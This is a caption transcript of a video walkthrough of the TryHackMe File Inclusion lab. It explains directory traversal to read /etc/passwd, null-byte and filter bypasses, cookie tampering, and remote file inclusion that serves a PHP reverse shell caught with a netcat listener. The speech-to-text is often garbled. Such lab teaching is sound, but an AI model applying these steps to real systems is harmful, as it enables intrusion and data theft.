File Inclusion Vulnerability Explained | TryHackMe Junior Penetration Tester

Video Statistics and Information

Video

Captions Word Cloud

Reddit Comments

Captions

welcome back everyone today we will be talking about fall inclusion file inclusion or this room about file inclusion is part of the junior penetration tester pathway you can reach the room by clicking on the pathway and then you click on file inclusion so basically in this room we will learn all of the tricks and techniques necessary for exploiting file inclusion vulnerability or let me say detecting and exploiting file inclusion vulnerability so let me start by saying that you have to first deploy the machine click on start machine you will get the ip address and you can start answering the questions from task three all the way to task eight all right so task three we have one question right before doing that let's copy the ip address and navigate through the browser superb suite is off let me reestablish the connection to the network okay and then gonna again try and access the server so upon opening the page we have around six labs and one playground we will go over all of these labs and throughout these labs we will go right scenarios of un covering and exploiting file including vulnerability so let's go to lab one click on lab one so in lab one we have a form right where we submit a file name the file name should be appended with a php extension as you can see for example welcome.php is an example so let's go with the form and type welcome php include current path this is var www.html list which is the path of the web server here file content preview of welcome.php this is the content of the welcome file now if you look at the browser let's make some zoom uh i guess this is better so let's look at the url here so in the url we have lab1 dot php which is a php file and then we have file file is the parameter and then welcome.php is the resource that is being handled by the file parameter so basically file inclusion vulnerability is all about trying to access other files on the system so we know that the handle here or the parameter file is used to access resources on the file system the allowed resources on or in this case is the welcome.php file so what if we would like to access other resources on define system so the simplest form of file including vulnerability is to remove this file and refer the parameter or make the parameter file here refer to other resources on the system an example would be viewing sensitive information such as etc pass wwd so as you can see we were able to reveal the content of a sensitive file this is the very primitive and simplest forms of file inclusion vulnerability this is an example of a website that you could see in the 80s or in the 70s right it is very there is no filters there is no checking there are no permissions there are no validation on the user inputs completely vulnerable site that's the kind of site you would see in the 80s or in the series as i said earlier you wouldn't find this kind of website or vulnerability in the web now but we start off with these kind of scenarios to illustrate the vulnerability and how to understand the mechanism behind it so as you can see here we aim to much like ssrf that we talked about in the last video we spot the parameter here and we see what what is the parameter used for so in this case it's used to refer to files on the web server directory so it means we can make the parameter right refer to other files in the system such as sensitive documents which marks the answer for the first question so task four we have give lab1 a try to read etc password what would be the request url this is the answer in lab two what is the directory specified in the include function so let's go to laptop we finished the lab1 go to lab2 so lab2 we have seems like we have the same structure we have php file lab2 and here a form to include a file name so if we type welcome php we see the content or the output is similar to the one we saw in lab1 welcome to dhm and here is the directory of the observer now in any scenario where you are trying to uncover a vulnerability you must first try the wrong input so here we've supplied the right output the expected output by the server is you supplying a welcome file or a file that exists in the server so what if we supplied file that doesn't exist for example if we type hi dot php hi just type hi the file actually doesn't exist so the server throws an error right saying here warning include includes hide.php so as you can see based on the output the web server is outputting the files or looking in the looking for the files you supply in the form in the includes directory so the include function looks for device in the includes directory if it finds a match it just prints the content of the file if it doesn't find a match it throws an error and this is the kind of error you see if the file doesn't exist so as you can see here the lab2.php exists in the web server directory and the server is actually including or using the include function to retrieve files from the includes directory so lab2.php contains the include function okay which retrieves files from the includes directory includes slash high.php so answering the question here what is a directory specified in the include function it is includes okay next task so next task we go to lab three four five six all right so how about we exploit this even if it's not required let's try to type etc password so we couldn't do that as you can see include includes slash slash etc password which means it couldn't find or it couldn't retrieve the file because we added an extra slash here what if we canceled the extra slash here and only type atc slash password so here also etc password doesn't exist all right so what you can do here i'm going to walk you through this you can just use directory traversal technique so basically you are in the web server directory here right so if you want to use directory traversal you will have to go up in directories using the two dots two dots slash two dots slash so first before deciding how many dots and slashes first you have to understand where you are right now we are here so we go up in order to escape out of this directory we have to go up three steps right and one extra step to reach the utc directory so what we do here we type one two three we are out of the observer now and one other two another one to escape or to reach the etc directory if you do that you will be able to see the content of the etc password so we have typed four ones the first three ones just to escape the web server directory and the extra one here is to move up one level to reach the etc directory okay lab3 what does it require there try to read the etc password what is the request look like all right so here we have a simple form and here we supply as you can see finally so if you type welcome without php without any extension current path and this is the content let's supply wrong input hi so let's take a look at the error the same here we are at the observer directory this is the php file and here you see the include function it looks for high in the includes directory and it also attaches or appends the php extension to the high so it didn't found it since it didn't find the high dot php it's through an error so what to do now so basically what we can do here in order to bypass this as you can see whatever we type in the box the php extension is added automatically to the input we add in the form so if we try to type here for example use it using directory traversal etc password it's not going to work as you can see why because the php extension is appended to the password file and indeed there is no file called password.php so how can we bypass this let me say um it's not filtering mechanism it's a kind of working mechanism right so what we can do we can add the null byte if we add the null byte after our inputs we can make the web server ignore all of the characters that comes or that come after the null byte let's copy the null byte from here and try it you see we were successful in displaying the output of the password file the null bytes here as i said earlier makes the web server ignored all of the characters that come after the null byte which means it's going to ignore the dot php extension and you will be able to print out the content of the file as you can see file extension is closely connected to directory traversal so you have to understand how to move up in levels in the directory structure of the linux file system this is the answer for this question next one which function is causing the directory traversal in lab4 now we're done with lab3 let's go to la four so question which function is causing the directory traversal in lab4 okay first let's do some experimentation so we supply first a wrong output high.php you have an error as you can see here we are in the under the web server directory and the php file is lab4 the lab for php contains the function file get contents hide.php so there is no specified directory here from which the function retrieves files which means that it is it it looks in the current working directory which is var www.html there is no high.php through an error now if we want to display the content of the password file again we tried a directory traversal trick etc passwd you're not allowed to see source files that's interesting but if we so basically this message uh means that there is some filtering mechanism behind the scenes right but it also means that we were able or this is the right command to reach or this is the right method to reach the etc password file that's why we uh we encountered this error message or the statement right so basically there is directory reversal vulnerability there is file including vulnerability here um and the function here file get contents is the vulnerable function so this is the answer for this question try out lab6 and check what is the directory that has to be in the input field okay let's go to lab6 now what's the question what is the directory that has to be in the input field so this is an example than profile slash tryhackmin.txt is an example where any parameter used in the url equals to a directory slash file so let's type thm slash one dot txt so we are under the var www.html directory and the lab6.php file handles the include function which retrieves the files under the thm profile directory so that is the directory being asked in the question try out lab6 and read etc os release what is the version id value so here we're required to read a sensitive file on the system which contains information about the operating system so now we knew that appending thm or appending a directory from which the files are retrieved is a necessary step in building your payload so basically any payload you will build you have to include the thm profile since it is necessary in retrieving files from the directory so if we type something here like this let me build the url first and the box so for those who are using mobile or cell phones can see the wallet clearly so thm profile right and now we type something like um okay so the question is if you see release let's try to view this file let's try first to omit this one and try with the directory traversal trick three four and type etc release one two three four that's fine copy the url and put it here access denied allowed files a dhm profile folder only okay so let's add dhm pro file so if we do it like this let's see if we are able to access the htc release and we are successful and as i said earlier it is very important to append the profile directory so this is the operating system information and this is the version version id is this one so that is task 5 task 6 now there is no required answer for task 6 but i'm going to explain how to do remote file inclusion in the challenge remediation no required answers challenge okay now go to the challenge so the challenge you can access the challenge using this url so you have three challenges go challenge one so challenge one capture flag one at etc etc flag one okay so once you open challenge one we are presented with a statement the input form is broken you need to send post requests with the file parameter so normally when we add something here we use get request right but the form will not work if we try the the same if you try to if we do if we drive with the same way we tried in the previous laps so we have to we have to use post request so we can use post requests either using perp suite by modifying the request or we can use curl which is my preferred way so if we open a new terminal and from here so girl specified as x for the request post and then we specify the url so basically now we specified the url and we specified the request then dash d here we specify the data that we would like to post on the web application so what we would like to do here let's go back the question is asking to read the content of the flag file right okay and also we have to change the method of the form so if you right click click inspect elements you see the form where's the form the form okay this is the start of the form here and uh okay that's fine so the method is get we have to change this and also we will change the file parameter so we have two parameters the file and the method these data can be set here so method equal get and file equal let's type atc flag 1 and give it a try so if you read if you read through the output you see here file contents of etc flag one and you get the flag one so that's what you have to just change the method to post and you can directly read the flag file no need for any kind of bypass mechanisms challenge one a challenge two now go back two so refresh the page please let's refresh the base welcome guest only admins can access this page so when you see restricted pages based on user credentials it means you have to play either with credentials or the cookies so for that reason i'm gonna turn on web suite and refresh the page again to see what the request looks like so we have a get request and we have also cookie dhm equal guests so now if you change this to admin you will be able to access the page forward so now as you can see we are able to access the page but that is not the the the end of the things here we display the content of the admin welcome admin this is an admin this is an admin pop page get the flag the flag is atc flag 2. so what we can do now we can refresh the base one more time and take a look at the request so again we are guests let's change that to or let's now try to access the etc flag too let's take a look at the error message so we are under var www.html the challenge file is child2.php includes a function includes the include function and which retrieves the files from the includes directory as you can see here everything went fine except two aspects the first one there is a php extension that is appended to the end of the file and there is one extra slash here so the first step in getting rid of these errors or these obstacles is first cancel the first latch so type etc flag 2 and use the null character to bypass the extension filter so let me look for the null byte let's take that and paste it here forward let's take a look so now we get another error but now as you can see we were able to ignore the extension and we were able to cancel the extra slash now we have to do some sort of directory traversal so let's refresh again and here type four move up four levels etc pass sorry flagged two and the null byte let's see if this works and this is the flag so that is the second question now the the last one or the third one is kind of interesting capture flag three at each cc factory so let's cancel now perp suite temporarily and go to challenge three channels three now lab3 challenge include a file in the input form below so it's expecting welcome so let's break the logic and type hi so this is a directory and this is the file handling the form and here we have or the file using the include function it is retrieving files under the same directory and it's also appending dot php here right now the regular method is let's copy the url and here we use directory traversal and let's type etc flag 3 and the null bytes let me put the help here says i'm going to need it so flag 3 and we've used the url here let's see what's gonna happen okay let's take a look now look at this you see here the slash has been cancelled between the etc and the flag and we still get the dot php extension so basically it means there is some kind of string filter here that's cancelling the slash and the dots so we can do here we can just type extra two dots and one extra slash the same here two dots excel slash two dots excel slash two dots access slash and try now why we do two dots and one extra slash because the web application is using a filter that cancels everything once it sees two dots it's gonna cancel everything right so the end statement will be only etc flag so we used extra two dots so that once the two dots are cancelled by the application or omitted by the application we have another two extra dots that protects the payload so we try this one and we see the same output okay i think it's time to try a post request so here let's use this one use the same payload actually i'm going to use the same payload but the method will be post see if this can make a difference here it will be method equal post and the url will change to three try this one output all right let's take a look at this so the post request worked as you can see the include function now is trying to retrieve this file and as you can see there is no changes in our payload which means that the only trick that we should have done is changing the request or the request method from get to post now the same payload what we would do here we would just cancel the extra slashes one here two dots also we have one here two so let's see if this will work and as you can see this is a flag so inclusion here as a conclusion there is no filtering on the application the only thing you have to do is to change the method to post but it didn't uh say that out loud here that you have to use post requests it just left your instinct to do to discover that all right so let's now move to the last question gain rce in lab playground slash playground.php with rfi to execute the hostname command what is the output okay now we go to remote file inclusion so now go back to the main page playground so include a file in the input form below okay hi so include hi doesn't exist no such file or directory so remote file inclusion is about changing the value of the parameter here so that the parameter equals to iorl on your server an example would be retrieving content from your server and download that content to the target machine and also executing that content an example would be reverse shells or text files whatever you want to execute so what's going to happen in the remote file inclusion let's take an example if we put here http domain.com slash shell php that's remote file inclusion now you make the web server the target one the include function here what it will do it's gonna take the url make the request to domain.com shell.php retrieves the shell.php downloads the file to the target machine and execute it that's the danger of include functions without input validation so now what we will do here we will go to our machine and start our web server okay let's make let's split the view here and now we create a simple php file right it could be reverse shell it could be any kind of file you would like to execute a simple example to start off is a text file this text file is um you know is written and made based on the challenge so nano cmd or cad cmd based on the challenge requirements so here it contains a php code that will execute the hostname command so now what's going to happen i'm going to go back and release them all in with my own machine ip ipconfig ipconfig one more time ah no oh sorry actually i confused that with windows so now we take that change the domain.com to ib don't forget the board and here's cmd.txt now this is your payload take that and enter so this is the hostname right now one more advanced step is to gain remote access to the machine it's not required by the challenge as you can see but i'm going to do that as a bonus on this video so alice now let's go let's go back and go to the repo directory go to web shell tools see the web cell do i have the option php upsell so i'm going to upload php reversal all right i'm going to start the python server yes yes it's already in use that's fine i'm gonna cancel this one and start it at the same directory where the php reversal exists okay now let's take this one and before doing that let's start the listener on my machine so the listener could be here nc.lpp 455 and hopefully we'll receive now a remote shell so replace the cn.txt here with the file name check it out and we have now remote access on the machine id we are the www data cd var and these are the terms files see the home no users on the system all right i hope the explanation was comprehensive and thorough and don't forget that i will be adding also the the notes here to the channel and also if you want to have the notes don't forget to subscribe to the channel membership thank you very much and see you the next video

Info

Channel: Motasem Hamdan

Views: 52,637

Rating: undefined out of 5

Keywords: File inclusion

Id: bMnuXZ70YdU

Channel Id: undefined

Length: 34min 6sec (2046 seconds)

Published: Sat Oct 30 2021